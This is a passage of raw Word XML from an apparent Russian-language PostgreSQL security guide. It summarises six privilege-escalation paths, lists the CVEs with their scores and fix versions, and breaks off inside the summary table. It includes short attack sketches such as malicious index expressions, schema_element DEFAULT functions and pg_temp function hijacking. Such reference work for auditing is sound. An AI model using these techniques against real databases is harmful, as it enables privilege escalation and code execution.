        <w:t xml:space="preserve"> для новых кластеров — частично снижает поверхность атаки для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>некоторых</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hijack-сценариев (где hijack идёт через public, не pg_temp), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pg_temp по-прежнему открыт для всех</w:t>
      </w:r>
      <w:r>
        <w:t>, поэтому 3.13.6-pattern остаётся актуальным даже в PG 15+.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E9172" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CEAD8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.2 search_path hijacking + schema_element (CVE-2023-2454)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — связанный класс уязвимостей по неполной квалификации в DDL. Граница: 3.13.2 — баг в CREATE SCHEMA; 3.13.6 — mis-configuration в CREATE FUNCTION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE53D8F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.4 Extension scripts (CVE-2022-2625)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — другой trojan-vector в admin-DDL. Связаны общей моделью угроз (4-я схема в обзоре 3.13.0: trap-объект).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B778565" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.1 SET ROLE (CVE-2024-10978)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — связан тем, что SECURITY DEFINER + SET search_path issues могут стать каналом для CVE-2024-10978 (плохая комбинация SECURITY DEFINER + некорректный reset).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734543A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 Identifier injection в plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — связанная категория: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s', ...)</w:t>
      </w:r>
      <w:r>
        <w:t>. Граница: 3.16 — невалидная квалификация identifiers; 3.13.6 — отсутствие квалификации в SECURITY DEFINER context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4340BD26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 / 3.7.2a / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — финальные RCE-векторы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A53B3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 (Mitigations)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — рекомендации по аудиту SECURITY DEFINER функций в кодовой базе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDE643B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B819CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «SECURITY DEFINER» в CREATE FUNCTION — https://www.postgresql.org/docs/current/sql-createfunction.html#SQL-CREATEFUNCTION-SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C2BCAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Writing SECURITY DEFINER Functions Safely» — https://www.postgresql.org/docs/current/sql-createfunction.html (раздел Writing SECURITY DEFINER Functions Safely)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACCB4E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>•   PostgreSQL Docs: «Schema Search Path» — https://www.postgresql.org/docs/current/ddl-schemas.html#DDL-SCHEMAS-PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A43DD87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Wiki: «Schema search_path attacks» — https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38964A1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Wiki: «Reasoning about security» — https://wiki.postgresql.org/wiki/Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A59AEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   CVE-2018-1058 (исторический контекст — search_path hijacking от postgres-роли) — https://www.postgresql.org/about/news/cve-2018-1058-protect-your-search-path-1834/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0434EA30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D08EB8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В категории 3.13 разобраны шесть путей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>privilege escalation в PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — от application-роли или PUBLIC до superuser или другой привилегированной роли. Пять из них якорятся на конкретные CVE (R8 / R12 / R15 / R16 / R28-chain), один (3.13.6) описывает классический mis-configuration без CVE. Главный тезис: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 — это не финальные RCE, а ступени</w:t>
      </w:r>
      <w:r>
        <w:t>. Сами по себе векторы дают только право; финал — в категории 3.7 (COPY PROGRAM, untrusted PL), 3.6.4 (file r/w), 3.17 (RLS bypass).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A41A8A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.1 SET ROLE / SET SESSION AUTHORIZATION (CVE-2024-10978)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — multi-tenant plan-cache leak. Утечка данных между tenant-ами, share-ящими одно соединение из pool. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Горизонтальная</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> эскалация: данные tenant_A видны при запросе tenant_B. Fix 14.11.2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F041D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.2 search_path hijacking + schema_element (CVE-2023-2454)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SCHEMA ... CREATE TABLE ... DEFAULT atk.evil()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обходит защитный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search_path = pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t>. RCE как admin, когда он выполняет такой DDL с user-controlled schema_element. Fix 11.05.2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5319FABE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.3 Index expressions + autovacuum/REINDEX (CVE-2022-1552)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE INDEX ... ((atk.evil(col)))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняется под superuser при autovacuum-ANALYZE. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Пассивная атака</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий ждёт автоматического trigger. Fix 12.05.2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B5229E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.4 Extension scripts (CVE-2022-2625)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — pre-create функции с signature из extension install-script + последующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от admin → ownership transfer с сохранением атакующего тела. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deferred trigger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при использовании extension-функции. Fix 11.08.2022.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFDC7D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.5 Trusted extensions chains (R28)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> non-superuser-ом (PG 13+) → chain в CVE-2024-10979 (RCE через plperl) или R16-style (через pre-create). Самостоятельная атака от tenant-admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE83EAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER без SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_temp.lower()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hijack любого unqualified-имени внутри SECURITY DEFINER функции. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не CVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, mis-configuration, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>актуальна во всех версиях PG</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B935D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Сводная таблица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452"/>
        <w:gridCol w:w="1085"/>
        <w:gridCol w:w="3188"/>
        <w:gridCol w:w="3188"/>
        <w:gridCol w:w="1632"/>
        <w:gridCol w:w="1647"/>
        <w:gridCol w:w="941"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="41832DE8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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753150E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Подраздел</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95B8A7B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE</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7DC8D10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS</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31C8CBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Затронуто</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94FCDC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fix-версии (ветки)</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5954D90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Минимальная привилегия ДО</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BCD6F18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Финальная привилегия</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32BC723" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Связь</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7708BC02"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84ECDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.1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7F7AA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10978</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91447D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4.2 (Medium)</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FD57DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 17.0/16.4/15.8/14.13/13.16/12.20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074B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.1/16.5/15.9/14.14/13.17/12.21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9F8CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SET ROLE на одну другую роль</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3AC164" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Чтение данных чужого tenant-а</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19E8E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.17.3 (RLS bypass)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="45C80E00"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218D9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.2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42A7AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2023-2454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26E03F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5 (High)</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75D9A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 15.2/14.7/13.10/12.14/11.19</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2AE25B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15.3/14.8/13.11/12.15/11.20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3ABA57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE на БД (для своей схемы)</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0B6A0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RCE как admin (запускающий DDL)</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F07BBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.2a / 3.7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="68DC91D7"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CDF802" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.3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02EAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2022-1552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FBADC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.8 (High)</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4608E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 14.2/13.6/12.10/11.15/10.20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D05186" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.3/13.7/12.11/11.16/10.21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D43FB8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE на схеме</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9D5EF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Arbitrary SQL под </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>autovacuum (superuser)</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5123F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>3.7.1 / 3.7.2a / 3.7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="18978A60"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D3D545" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.4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A9B50D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2022-2625</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93664C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.8 (High)</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C862C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 14.4/13.7/12.11/11.16/10.21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81443B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.5/13.8/12.12/11.17/10.22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23552A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE FUNCTION в схеме (public до PG 15)</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86FBE9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RCE как admin при использовании extension-функции</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7AD058" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.1 / 3.7.2a / 3.7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="66BDCCD0"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A44684" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.5 chain 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31EDED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10979 (chain)</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816AE0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.8 (High)</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EDDBAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 17.0/16.4/15.8/14.13/13.16/12.20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1186EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17.1/16.5/15.9/14.14/13.17/12.21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719DA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
